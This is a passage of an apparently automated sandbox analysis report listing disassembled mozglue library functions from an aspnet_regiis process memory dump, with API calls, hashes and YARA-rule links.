                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7CDC4
                                                                                                                              • Part of subcall function 6CC77480: ReleaseSRWLockExclusive.KERNEL32(?,6CC815FC,?,?,?,?,6CC815FC,?), ref: 6CC774EB
                                                                                                                            • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7CECC
                                                                                                                              • Part of subcall function 6CC3CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC3CAA2
                                                                                                                              • Part of subcall function 6CC6CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CC7CEEA,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?,00000000), ref: 6CC6CB57
                                                                                                                              • Part of subcall function 6CC6CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CC6CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CC7CEEA,?,?), ref: 6CC6CBAF
                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7D058
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 861561044-0
                                                                                                                            • Opcode ID: fcdeeb2b129c73319f321885b167030f4b16a80a53a60d0912d9e575d7a46585
                                                                                                                            • Instruction ID: 3644941f194fe1582b23517a2412bf36a50aa0c887aca3661d0626191f67ee56
                                                                                                                            • Opcode Fuzzy Hash: fcdeeb2b129c73319f321885b167030f4b16a80a53a60d0912d9e575d7a46585
                                                                                                                            • Instruction Fuzzy Hash: 71D16B71A04B469FD718CF28C580B99F7F1FF89308F01866DD8598B712EB31A9A5CB91
                                                                                                                            Function 6CC31720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC317B2
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?,?), ref: 6CC318EE
                                                                                                                            • free.MOZGLUE(?), ref: 6CC31911
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC3194C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3725304770-0
                                                                                                                            • Opcode ID: 998ada35257aada0406899b5a919b017e43b553f012f12c5fb1387b8f6e2c2f0
                                                                                                                            • Instruction ID: b4aa7a519a50bef9e85bba884b537d6cf7f2eac844f93a1e7fc97394ca40259f
                                                                                                                            • Opcode Fuzzy Hash: 998ada35257aada0406899b5a919b017e43b553f012f12c5fb1387b8f6e2c2f0
                                                                                                                            • Instruction Fuzzy Hash: B481A170A113159FCB08CF6CE8949AEBBB1FF89314F04552CE819AB754E730E955CBA2
                                                                                                                            Function 6CC45C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTickCount64.KERNEL32 ref: 6CC45D40
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC45D67
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC45DB4
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC45DED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 557828605-0
                                                                                                                            • Opcode ID: 85e35fba36e4ea7bf9ba5487e0d38f9ddcbfde8686df83a27edfb111550fda58
                                                                                                                            • Instruction ID: f716f7073a8d34f0fc5861c9cdd4514b5b32201af4000951e98ae2d8ef5bfd64
                                                                                                                            • Opcode Fuzzy Hash: 85e35fba36e4ea7bf9ba5487e0d38f9ddcbfde8686df83a27edfb111550fda58
                                                                                                                            • Instruction Fuzzy Hash: FD515E71E001198FDF08CFA8C958AAEBBB1FF89304F19865DD811A7760D731A945CBD0
                                                                                                                            Function 6CC2CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC2CEBD
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC2CEF5
                                                                                                                            • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC2CF4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 438689982-4108050209
                                                                                                                            • Opcode ID: d64cf3e0ada84685a86c7dd8d1c4166e76fc3e9811e6bbe00ce290d25c9f09b2
                                                                                                                            • Instruction ID: c630102a7af5a27ad8c5fe3a725c538b83aa87c45f6b2b185cebf338dadc69a6
                                                                                                                            • Opcode Fuzzy Hash: d64cf3e0ada84685a86c7dd8d1c4166e76fc3e9811e6bbe00ce290d25c9f09b2
                                                                                                                            • Instruction Fuzzy Hash: F7510175A002568FCB00CF19C890AAABBB5FF99300F19859DD8595F352E735ED06CBE0
                                                                                                                            Function 6CC877D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC877FA
                                                                                                                            • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CC87829
                                                                                                                              • Part of subcall function 6CC5CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6CC231A7), ref: 6CC5CC45
                                                                                                                              • Part of subcall function 6CC5CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6CC231A7), ref: 6CC5CC4E
                                                                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC8789F
                                                                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC878CF
                                                                                                                              • Part of subcall function 6CC24DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC24E5A
                                                                                                                              • Part of subcall function 6CC24DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC24E97
                                                                                                                              • Part of subcall function 6CC24290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC63EBD,6CC63EBD,00000000), ref: 6CC242A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2525797420-0
                                                                                                                            • Opcode ID: cc911addff4151ebd9272c611ce06dfb9736f30741bc208fc5274096c8c96491
                                                                                                                            • Instruction ID: a1f8c3c15ce2514cb6677a153067d5b9f3c64879397093a74b3e97ce5c573fbb
                                                                                                                            • Opcode Fuzzy Hash: cc911addff4151ebd9272c611ce06dfb9736f30741bc208fc5274096c8c96491
                                                                                                                            • Instruction Fuzzy Hash: 5841AE71A047069BD300DF29D48056BFBF4FF8A258F604A2EE4A987640EB30E559CB92
                                                                                                                            Function 6CC66470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CC682BC,?,?), ref: 6CC6649B
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC664A9
                                                                                                                              • Part of subcall function 6CC5FA80: GetCurrentThreadId.KERNEL32 ref: 6CC5FA8D
                                                                                                                              • Part of subcall function 6CC5FA80: AcquireSRWLockExclusive.KERNEL32(6CCAF448), ref: 6CC5FA99
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC6653F
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6655A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3596744550-0
                                                                                                                            • Opcode ID: f19282f962d60242444cc4bf060be1368c0827d21a763cc2a5718dc7a05f9f00
                                                                                                                            • Instruction ID: f1401f997e05441ed45442c9349c5a8dd2ea38d35c34cbc368f1fc471b77c2c3
                                                                                                                            • Opcode Fuzzy Hash: f19282f962d60242444cc4bf060be1368c0827d21a763cc2a5718dc7a05f9f00
                                                                                                                            • Instruction Fuzzy Hash: 0C31A0B5A047059FD700CF25D984A9EBBF4FF88314F00842EE89A97741EB30E919CB92
                                                                                                                            Function 6CC5FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?), ref: 6CC5FFD3
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?), ref: 6CC5FFF5
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?), ref: 6CC6001B
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?), ref: 6CC6002A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 826125452-0
                                                                                                                            • Opcode ID: 27fc1c7f335dae1ddaac683b8f332b0780266f86f7c326228319dc7813e1df25
                                                                                                                            • Instruction ID: 41cff5c562c9a3ac1eda70c2850b1ea6e6727bfad010d99d8f9dcf8ddd0a8eca
                                                                                                                            • Opcode Fuzzy Hash: 27fc1c7f335dae1ddaac683b8f332b0780266f86f7c326228319dc7813e1df25
                                                                                                                            • Instruction Fuzzy Hash: 0F21F4B2A002155FC7089E689CD48AEB7BAFB853243254338E525D7B80FA319D1182A4
                                                                                                                            Function 6CC3B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC3B4F5
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3B502
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3B542
                                                                                                                            • free.MOZGLUE(?), ref: 6CC3B578
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2047719359-0
                                                                                                                            • Opcode ID: 55756737ed68c1c662120a6210027df3bde1a4cdfbf2ae933609b584751db9a0
                                                                                                                            • Instruction ID: a45cddc877f7d9ae4eb6184e6e2b29bd568ab98ded6ed5f9d3533f6b2901e51e
                                                                                                                            • Opcode Fuzzy Hash: 55756737ed68c1c662120a6210027df3bde1a4cdfbf2ae933609b584751db9a0
                                                                                                                            • Instruction Fuzzy Hash: 0911AF31A04F59CBD7118F69E418765B3B1FF96318F14A70AE84D53E01FBB5A1C587A0
                                                                                                                            Function 6CC63DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC2F20E,?), ref: 6CC63DF5
                                                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC2F20E,00000000,?), ref: 6CC63DFC
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC63E06
                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CC63E0E
                                                                                                                              • Part of subcall function 6CC5CC00: GetCurrentProcess.KERNEL32(?,?,6CC231A7), ref: 6CC5CC0D
                                                                                                                              • Part of subcall function 6CC5CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC231A7), ref: 6CC5CC16
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2787204188-0
                                                                                                                            • Opcode ID: 820e0ea8b952aff5a1f05e8756a4485976d68f7ea9a835b60e8f0b5e539942e4
                                                                                                                            • Instruction ID: 66d9e6b6ccd5887381e0c3c3610c6c8298287b6b9249e63e2ad2f468b4cc3021
                                                                                                                            • Opcode Fuzzy Hash: 820e0ea8b952aff5a1f05e8756a4485976d68f7ea9a835b60e8f0b5e539942e4
                                                                                                                            • Instruction Fuzzy Hash: E6F0FE719002086BD704AB95EC85DAF377DDB46628F084020FD0857741E636B92586F7
                                                                                                                            Function 6CC785B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CC785D3
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CC78725
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                            • String ID: map/set<T> too long
                                                                                                                            • API String ID: 3720097785-1285458680
                                                                                                                            • Opcode ID: 2a78e354993f5054aa401dbd1151eee953067f62483745f9b92bd266906d6253
                                                                                                                            • Instruction ID: c01c647eeb63700e74a89d529c70d4c55c9da23a694d793b91d7452f9757932b
                                                                                                                            • Opcode Fuzzy Hash: 2a78e354993f5054aa401dbd1151eee953067f62483745f9b92bd266906d6253
                                                                                                                            • Instruction Fuzzy Hash: 4B516674600641DFD711CF18C084A59BBF1FF4A328F18C18ADA596BB52D335E885CFA2
                                                                                                                            Function 6CC2BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC2BDEB
                                                                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC2BE8F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2811501404-4108050209
                                                                                                                            • Opcode ID: 002f55dd0941b96d120bb2cd229175a4040321994f2245681434f0d90823807d
                                                                                                                            • Instruction ID: 1a56932559575324ca55aa564de8cb6e519db039ae7cc73dbb1befaa3dca3633
                                                                                                                            • Opcode Fuzzy Hash: 002f55dd0941b96d120bb2cd229175a4040321994f2245681434f0d90823807d
                                                                                                                            • Instruction Fuzzy Hash: 0041B171909745CFC701CF39C491A9BBBF4BF8A348F008A5DF986A7611E734E9598B82
                                                                                                                            Function 6CC63CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC63D19
                                                                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC63D6C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnomozalloc_abort
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3471241338-2564639436
                                                                                                                            • Opcode ID: 5197adb7c794e6904c59bc6f795c0f337e310fe499528db85ecd8add8c20fa71
                                                                                                                            • Instruction ID: 761d84d3caeeea325414af31841ba8cc398ca85494312d788b97873be7158049
                                                                                                                            • Opcode Fuzzy Hash: 5197adb7c794e6904c59bc6f795c0f337e310fe499528db85ecd8add8c20fa71
                                                                                                                            • Instruction Fuzzy Hash: A211E735E14688D7DB008FAECD584EDB775EF97318B499259DC45ABA02FB30A9C4C390
                                                                                                                            Function 6CC86DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CC86E22
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC86E3F
                                                                                                                            Strings
                                                                                                                            • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CC86E1D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footergetenv
                                                                                                                            • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                            • API String ID: 1472356752-1153589363
                                                                                                                            • Opcode ID: e177fb1eecaa9b42ac56caa150678dd4aeacad5cce00f045df35e2d4f093d7b8
                                                                                                                            • Instruction ID: 8cd115eb96b01c4080520f46cf945b2a922db1249aa6de6d04b2fab61d271986
                                                                                                                            • Opcode Fuzzy Hash: e177fb1eecaa9b42ac56caa150678dd4aeacad5cce00f045df35e2d4f093d7b8
                                                                                                                            • Instruction Fuzzy Hash: 21F0FA306066418EDA208AE8E858A9A3B72A35231CF040265C85087BB1F671E527CBA3
                                                                                                                            Function 6CC39E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC39EEF
                                                                                                                            Strings
